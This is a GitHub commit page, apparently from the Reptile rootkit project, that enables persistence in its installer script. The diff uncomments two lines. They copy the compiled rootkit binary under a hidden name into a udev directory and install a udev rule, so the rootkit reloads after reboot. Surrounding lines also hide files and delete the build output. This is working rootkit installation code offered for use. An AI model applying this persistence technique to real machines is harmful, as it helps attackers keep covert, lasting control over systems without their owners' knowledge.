Skip to content

Commit

Permalink
uncommenting lines with persistence
Browse files Browse the repository at this point in the history
  • Loading branch information
f0rb1dd3n committed Mar 2, 2020
1 parent 3e9b232 commit f423d63
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions scripts/installer.sh
Original file line number Diff line number Diff line change
Expand Up @@ -36,8 +36,8 @@ sed -i s!XXXXX!$TAG_NAME! /$HIDE/$HIDE"_start" && \
cp $PWD/../output/reptile /$HIDE/$HIDE && \

# Make persistent
#cp $PWD/../output/reptile $UDEV_DIR/$HIDE && \
#cp $PWD/../scripts/rule $RULE && \
cp $PWD/../output/reptile $UDEV_DIR/$HIDE && \
cp $PWD/../scripts/rule $RULE && \

# cleaning output dir
rm -rf $PWD/../output && \
Expand Down

0 comments on commit f423d63

Please sign in to comment.